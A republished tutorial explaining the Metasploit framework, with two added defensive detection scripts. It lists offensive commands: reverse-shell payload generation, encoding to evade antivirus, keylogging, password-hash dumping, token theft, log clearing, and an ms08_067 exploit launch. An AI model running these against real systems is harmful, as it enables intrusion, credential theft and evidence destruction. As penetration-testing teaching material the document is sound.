Detailed explanation of Metasploit tool

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/01 Report--

Introduction to Metasploit

Metasploit is an open-source vulnerability detection tool that helps security and IT professionals identify security issues, verify vulnerability mitigations and manage expert-driven security assessments, providing real security risk intelligence. Its features include smart exploitation, code auditing, web application scanning and social engineering.

Basic framework

Metasploit is a modular system; the framework as a whole can be divided into the following module types:

1. Exploit modules

2. Auxiliary modules

3. Nop modules

4. Payload modules

5. Encoder modules

6. Post-exploitation modules

An application that interfaces with the Metasploit framework, such as Armitage, can be considered a sixth type, but it is not part of the framework itself.

Exploit module (exploit): code that uses a discovered security vulnerability or configuration weakness to attack a remote target system.

(1) Active exploit modules (server-side attacks)

(2) Passive exploit modules (client-side attacks)

Auxiliary module (Aux): implements information gathering, password guessing, DoS attacks and so on; these cannot directly obtain privileges on the server.

Nop module (Nop): a null instruction (NOP) is an empty or irrelevant instruction that has no substantive effect on the running state of the program.

The most typical null instruction is the no-operation instruction; on the x86 CPU architecture its opcode is 0x90.

When an attacker constructs a malicious data buffer, a region of null instructions is often placed before the shellcode that is actually to be executed.

In this way, when the exploit is triggered and execution jumps to the shellcode, there is a larger safe landing zone. This avoids shellcode execution failures caused by memory address randomization, errors in the calculated return address and similar problems, and so improves the reliability of the attack.
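As an added example (not from the original article), the following Python function looks at the NOP sled technique described above from the defender's side: it reports runs of the x86 NOP opcode 0x90 of at least a given length, which is the idea behind classic IDS "x86 NOOP" signatures. The sample buffers and the threshold of 16 bytes are constructed for illustration.

```python
# Added example, not part of the original article: a NOP sled detector.
# It scans a byte buffer for long runs of the x86 NOP opcode 0x90 and
# reports the offset and length of each run that meets the threshold.
from typing import List, Tuple

X86_NOP = 0x90


def find_nop_sleds(buf: bytes, min_len: int = 16) -> List[Tuple[int, int]]:
    """Return (offset, length) for every run of >= min_len consecutive 0x90 bytes."""
    runs = []
    i = 0
    n = len(buf)
    while i < n:
        if buf[i] != X86_NOP:
            i += 1
            continue
        start = i
        while i < n and buf[i] == X86_NOP:
            i += 1
        if i - start >= min_len:
            runs.append((start, i - start))
    return runs


def is_suspicious(buf: bytes, min_len: int = 16) -> bool:
    """True when at least one qualifying NOP run is present."""
    return bool(find_nop_sleds(buf, min_len))


# Constructed samples: a 64-byte sled followed by an int3 stub (0xCC, never
# executed here), and a benign buffer with only scattered 0x90 bytes.
SAMPLE_SLED = b"\x90" * 64 + b"\xcc\xcc\xcc\xcc"
SAMPLE_BENIGN = b"\x90\x41\x90\x42" + b"\x00" * 60

if __name__ == "__main__":
    print(find_nop_sleds(SAMPLE_SLED))    # [(0, 64)]
    print(find_nop_sleds(SAMPLE_BENIGN))  # []
```

Compilers also pad between functions with 0x90 for alignment, so on real binaries the threshold has to be tuned and a hit combined with other indicators before it is treated as shellcode.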

Encoder module (encode): after the payload and Nop modules have assembled an instruction sequence, and before the exploit module adds this malicious data to the buffer and hands it to the target system to run, the Metasploit framework has to complete a very important step: encoding.

The first task of the encoder module is to make sure the payload contains none of the "bad characters" that must be avoided.

The second task of the encoder is to make the payload evade detection, that is, to avoid being detected and blocked by anti-virus software, intrusion detection systems (IDS) and intrusion prevention systems (IPS).

Post-exploitation module (post): used to maintain access.

Plug-in:

Interfaces: msfconsole (the most common), msfcli (removed in the latest version), msfgui (graphical interface), etc.

Utility programs: msfconsole, the main framework, can carry out the whole process (information gathering, exploitation, access).

msfvenom (integrates all the functions of msfpayload and msfencode); msfpayload and msfencode (both removed in the new version).

The payload can be packaged in many forms (exe, PHP, Java, apk, C, Python ... very powerful).

msf*scan (msfelfscan, msfpescan, msfbinscan, msfmachscan): searches for specific instructions in files of various types, such as PE and ELF, which helps exploit developers locate instruction addresses.

Payload module (payload): a payload is a piece of implanted code that the target system runs after a successful attack. The most common payloads are bind shells and reverse shells.

Bind shell

This kind of shell lies dormant on the target, listening on a port and waiting for the attacker to connect or send instructions.

Reverse shell

A reverse shell connects back to the user for immediate instruction and interaction.

Listener

Listeners are powerful helpers in the Metasploit framework: they interact with the sessions established through payloads. A listener can either be embedded in a bind shell and wait for a connection, or actively listen for a connection from the security tester's computer.

Shellcode

Shellcode itself is not a module; it is more like a sub-module embedded in the payloads available in the Metasploit framework.

Metasploit usage

Metasploit currently provides three user interfaces: a GUI mode, a console mode and a CLI (command line) mode. A web mode was originally provided but is no longer supported. Each of the three modes has its own advantages and disadvantages, but the MSF console mode is recommended: almost all the functions MSF provides can be used from the console, and some external commands, such as ping, can also be executed from it.

Type msfconsole to enter the Metasploit command interface.

Start / stop the service

View the Metasploit service status:

service metasploit status

Restart the service:

service metasploit restart

Stop the service:

service metasploit stop

Update the database by entering the following command in a terminal:

msfupdate

After an update is detected, download and install it immediately, restart the service, and then reopen msfconsole.

Detailed explanation of command

show exploits

List all exploit modules in the Metasploit framework.

show payloads

List all payloads in the Metasploit framework.

show auxiliary

List all auxiliary modules in the Metasploit framework.

search name

Search the Metasploit framework for exploits and other modules matching name.

info

Display information about the specified exploit or module.

use name

Load an exploit or module.

LHOST

The local IP address the target host can connect back to. When the target host is not on the same LAN this usually needs to be a public IP address, especially for reverse shells.

RHOST

The remote host, i.e. the target host.

set function

Set a specific configuration parameter (e.g. the local or remote host parameters).

setg function

Set a specific configuration parameter globally (e.g. the local or remote host parameters).

show options

List all configuration parameters of an exploit or module.

show targets

List all target platforms supported by the exploit.

set target num

Specify the operating system and patch level of the target, if known.

set payload name

Specify the payload to use.

show advanced

List all advanced configuration options.

set autorunscript migrate -f

After exploitation completes, automatically migrate into another process.

check

Check whether the target actually has the vulnerability the selected exploit targets.

exploit

Run the exploit or module against the target.

exploit -j

Run the exploit as a background job.

exploit -z

Do not interact with the session after the exploit completes.

exploit -e encoder

Specify the encoder to use (e.g. exploit -e shikata_ga_nai).

exploit -h

List help information for the exploit command.

sessions -l

List the available interactive sessions (used when handling multiple shells).

sessions -l -v

List all available interactive sessions with details, e.g. which vulnerability was used to attack the system.

sessions -s script

Run a specific Metasploit script in all active Metasploit sessions.

sessions -K

Kill all active interactive sessions.

sessions -c cmd

Run a command on all active Metasploit sessions.

sessions -u sessionID

Upgrade an ordinary win32 shell to a Meterpreter shell.

db_create name

Create a database for the database driver to use (e.g. db_create autopwn).

db_connect name

Create and connect to a database for the database driver to use (e.g. db_connect user:passwd@ip/sqlname).

db_nmap

Run nmap and store the scan results in the database (ordinary nmap arguments are supported, e.g. -sT -v -P0).

db_autopwn -h

Show help for the db_autopwn command.

db_autopwn -p -r -e

Run db_autopwn: attack all systems on all discovered open ports and use a reverse shell.

db_destroy

Delete the current database.

db_destroy user:passwd@host:port/database

Delete the database using advanced options.

Meterpreter commands

help

Open the Meterpreter help.

run scriptname

Run a Meterpreter script; all script names can be seen in the scripts/meterpreter directory.

sysinfo

List the system information of the controlled host.

ls

List the files and folders on the target host.

use priv

Load the privilege escalation extension module to extend the Meterpreter library.

ps

Display all running processes and the user accounts associated with them.

migrate PID

Migrate into the specified process ID (the PID can be obtained on the host with the ps command).

use incognito

Load the incognito extension (used to steal tokens from the target host or impersonate users).

list_tokens -u

List the available user tokens on the target host.

list_tokens -g

List the available group tokens on the target host.

impersonate_token DOMAIN_NAME\\USERNAME

Impersonate an available token on the target host.

steal_token PID

Steal the token of the given process and impersonate it.

drop_token

Stop impersonating the current token.

getsystem

Elevate privileges on the system through various attack vectors.

execute -f cmd.exe -i

Execute cmd.exe and interact with it.

execute -f cmd.exe -i -t

Execute cmd.exe with all available tokens and hide the process.

rev2self

Return to the initial user account that controls the target host.

reg command

Interact with the target host's registry: create, delete, query and other operations.

setdesktop number

Switch to another user's desktop (this depends on which users are logged in).

screenshot

Take a screenshot of the target host.

upload file

Upload a file to the target host.

download file

Download a file from the target host.

keyscan_start

Start the keylogger on the remote target host.

keyscan_dump

Dump the keystrokes captured on the target host.

keyscan_stop

Stop keylogging on the target host.

getprivs

Obtain as many privileges as possible on the target host.

uictl enable keyboard/mouse

Take over the keyboard and mouse of the target host.

background

Send the current Meterpreter shell to the background.

hashdump

Dump the password hashes from the target host.

use sniffer

Load the sniffer extension.

sniffer_interfaces

List all open network interfaces of the target host.

sniffer_dump interfaceID pcapname

Start sniffing on the target host.

sniffer_start interfaceID packet-buffer

Start sniffing on the target host with a specific packet buffer size.

sniffer_stats interfaceID

Get statistics for the network interface currently being sniffed.

sniffer_stop interfaceID

Stop sniffing.

add_user username password -h ip

Add a user on the remote target host.

clearev

Clear the event logs on the target host.

timestomp

Modify file attributes such as the creation time (anti-forensics).

reboot

Restart the target host.
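The clearev and timestomp commands above are anti-forensic, so here is the check a defender would run against forwarded Windows event logs, as an added example that is not from the original article: clearing the Security log records Event ID 1102, and clearing the System or Application log records Event ID 104 in the System log, both from the Microsoft-Windows-Eventlog provider. The JSON-lines export format, host names, account names and timestamps are constructed for this example.

```python
# Added example, not part of the original article: detection logic for the
# log clearing that the clearev command performs. Input is a constructed,
# SIEM-style export with one JSON event per line.
import json
from typing import Dict, List

# (channel, event_id) pairs that indicate a Windows event log was cleared.
LOG_CLEAR_EVENTS = {
    ("Security", 1102): "Security audit log cleared",
    ("System", 104): "System or Application log cleared",
}

# Constructed sample export: normal activity, then both clear events.
SAMPLE_EVENTS = """
{"time": "2024-05-01T10:00:01Z", "host": "WS01", "channel": "Security", "event_id": 4624, "user": "alice", "provider": "Microsoft-Windows-Security-Auditing"}
{"time": "2024-05-01T10:05:42Z", "host": "WS01", "channel": "Security", "event_id": 1102, "user": "alice", "provider": "Microsoft-Windows-Eventlog"}
{"time": "2024-05-01T10:05:43Z", "host": "WS01", "channel": "System", "event_id": 104, "user": "alice", "provider": "Microsoft-Windows-Eventlog"}
{"time": "2024-05-01T10:06:00Z", "host": "WS02", "channel": "System", "event_id": 7036, "user": "SYSTEM", "provider": "Service Control Manager"}
""".strip()


def parse_events(text: str) -> List[Dict]:
    """Parse one JSON event per line, skipping blank or malformed lines."""
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            events.append(json.loads(line))
        except json.JSONDecodeError:
            continue  # malformed export line: skip rather than abort the run
    return events


def find_log_clearing(events: List[Dict]) -> List[Dict]:
    """Return one alert record per event that indicates a log was cleared."""
    alerts = []
    for ev in events:
        key = (ev.get("channel"), ev.get("event_id"))
        if key in LOG_CLEAR_EVENTS:
            alerts.append({
                "time": ev.get("time"),
                "host": ev.get("host"),
                "user": ev.get("user"),
                "reason": LOG_CLEAR_EVENTS[key],
            })
    return alerts


if __name__ == "__main__":
    for alert in find_log_clearing(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The 1102 or 104 record is written into the freshly cleared log, so it is usually the only entry left on the host itself; forwarding events to a collector before the clear is what preserves the earlier history.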

msfpayload commands

msfpayload -h

Help information for msfpayload.

msfpayload windows/meterpreter/bind_tcp O

List the configuration options of the windows/meterpreter/bind_tcp payload (any payload can be used here).

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT X > payload.exe

Create a Metasploit reverse_tcp payload that connects back to LPORT on LHOST, saved as a Windows executable named payload.exe.

msfpayload windows/meterpreter/reverse_tcp LHOST=IP LPORT=PORT R > payload.raw

Create a Metasploit reverse_tcp payload that connects back to LPORT on LHOST, saved in raw form as payload.raw for later use with msfencode.

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT C > payload.c

Create a Metasploit reverse_tcp payload and export the shellcode in C format.

msfpayload windows/meterpreter/reverse_tcp LPORT=PORT J > payload.java

Create a Metasploit reverse_tcp payload and export it as a %u-encoded JavaScript string.

msfencode commands

msfencode -h

List the help for msfencode.

msfencode -l

List all available encoders.

msfencode -t (c, elf, exe, java, perl, …)

Format of the encoded buffer.

msfencode -i payload.raw -o encoded_payload.exe -e x86/shikata_ga_nai -c 5 -t exe

Encode payload.raw 5 times with the shikata_ga_nai encoder, then write the result to a file named encoded_payload.exe.

msfpayload windows/meterpreter/bind_tcp LPORT=PORT R | msfencode -e x86/countdown -c 5 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t exe -o multi-encoded_payload.exe

Create a payload that is encoded with several nested encoders.

msfencode -i payload.raw BufferRegister=ESI -e x86/alpha_mixed -t c

Create pure alphanumeric shellcode, output in C format, that takes its own address from the ESI register only.

msfcli commands

msfcli | grep exploit

List only the exploit modules.

msfcli | grep exploit/windows

List only the exploit modules related to Windows.

msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E

Launch the ms08_067_netapi exploit against IP, configured with the bind_tcp payload bound to PORT and listening there.

That's basically it. For more hands-on tutorials, please see the next installment.
